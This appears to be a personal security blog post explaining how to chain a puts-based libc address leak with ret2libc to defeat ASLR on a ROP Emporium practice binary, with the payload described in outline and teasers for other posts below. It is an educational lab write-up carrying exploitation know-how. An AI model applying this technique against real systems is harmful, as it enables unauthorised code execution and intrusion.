Skip to main content

Reiterate the Concept of Ret2libc + defeating ASLR ◉_◉ (day 49)


In the previous post about ret2libc, we found out that attackers can bypass the NX protection by just combining their payload with other functions in libc library to able to gain control of the program.

but we are able to pop a shell because the ASLR is on, can we still do it if it's on ?

sure you can!

so in this post, I will show you how to escalate ret2libc into bypassing ASLR

note: the following binary is not protected with PIE, this means every time the code is loaded the instruction register is not changing

 

for the demonstration, I will use the binary split 32 bit from ROPemporium (https://ropemporium.com/)


from the figure above we can see that the binary is pretty simple, it asks you about input and it doesn't show anything yet, a classic BOF !


when we check all the functions we can see functions name "pwnme" this can be a clue to start our exploit.


when we disassemble the function we can see that the fgets functions set the buffer in the wrong size and we can prove it by putting a large buffer into the program



from crashing the program we can see that it takes 44 offsets to overwrite the EIP

In typical ret2libc exploit, from here you need to find system, exit and bin/sh location put it together and you will get a shell but you guys need to remember that the ASLR is on it means that the location of this function will surely change every time we run


so how do we make our code to adapt to the ASLR? we can use ret2puts approach the concept of it is merely the same as ret2libc but instead combine it with system function to pop a shell, we use puts function to dump the libc address

if you take a look at the main function there is plenty of puts function we can use but notice the call address is end up same which is in this case 0x8048420


when we analyze the function here we can see it is pointing to the GOT table which reveals the actual address of the function in the program.


note: you need to be able to distinguish PLT and GOT in ELF. GOT use for mapping the function address whereas PLT is just a stub function that pointing to the GOT table

from here we can craft our payload to be like this:

payload = puts@function + main@function + puts@GOT

  • puts@function is the function that we will call
  • main@function is the return function so after the puts execute its task it will be back to the main again
  • puts@GOT is the param for function puts

when we run this payload this will dump the puts location in libc and we can use this value to be subtracted with the relative address of puts function in the program. The result of this calculation will give you the libc address in the OS


cool! so we got the "puts" function in libc in realtime, now all we have to do is to subtract this value with the relative address of "puts" in the function program like this.

to get the relative address of "puts" you can do it like the below picture.


cool now we can get the rest of the payload (system, exit, "/bin/sh")


combine with all of the information we get and we should update our script like this:



run the script and we got a shell :) cool! we able to bypass NX and ASLR at the same time :D



Labels:

Comments

Post a Comment

Popular posts from this blog

Having fun analyzing nginx log to find malicious attacker in the net (ง'̀-'́)ง (day 37)

  What makes you sleepless at night? is it because of a ghost or scary stories? is it because you have an important meeting tomorrow? or is it because you have an exam? For me, what keeps me up all night is that I keep thinking about what happens to a website that I just created, is it safe from an attacker (certainly not) or did I missing some security adjustments that lead to vulnerability? well I'm not the best secure programmer in the world, I'm still learning and there is a big possibility that I can make a mistake but for me, a mistake can be a valuable investment to myself or yourself to be better so from this idea, I want to know more about what attackers casually do when attacking a website. Here in this post, I'm going to show you how I analyzed attack to the website that I have permission to design and also some interesting findings that I could get from the analysis Background: All of this analysis comes from the traffic that is targeted to th...
Post a Comment
Read More »

Utilize Pwntools for crafting ROP chain :') (day 69)

who doesn't like pwntools? it is a very versatile tool and can be customized according to our need using the python script but did you need to know that pwntools itself can help us to automatically craft a rop chain for us? so in this post, I will show you how to make rop chain less painful and make pwntools do all the heavy lifting. To demonstrate this I will use the binary challenge callme 64 bit from ropemporium link: https://ropemporium.com/challenge/callme.html Crashing the app: Like any other exploitation process, we need to crash the program by generating a long string pattern to determine the offset. based on the information from the above figure we can see that we required to provide 40 bytes of offset Fun stuff: now this where the fun stuff began write the following python script: as in the guideline of the challenged said we need to chain the function call by first to call the callme_one function, callme_two function and then callme_three funct...
Post a Comment
Read More »

Why you should always cautious on your VPN: Study Case on Broken Cryptography of Android VPN (day 91) ಠ_ಠ

source: https://me.me/i/when-you-make-a-meme-in-europe-but-you-use-22778509 Disclaimer: This blog post is heavily based on https://www.youtube.com/watch?v=ofTts7jlC2Y&t=177s created by Lukas Stefanko. I strongly suggest you guys check his youtube videos it contain many great android security study cases that you can learn free Background: Who doesn't know VPN, right?! It is a wonderful program that lets us maintain the confidentiality of our identity and information while surfing the internet. It is fast and more importantly is "FREE!" there are tons of free VPN applications that you can download in play store and use it in a click of a button. The workflow is also not really that difficult to understand: Source: https://blog.sucuri.net/2020/03/vpn-secure-online-work-environment.html Pay attention to the above figure, this diagram explains the difference in our connection when using a VPN and not using VPN. When using a VPN before we connect to ...
Post a Comment
Read More »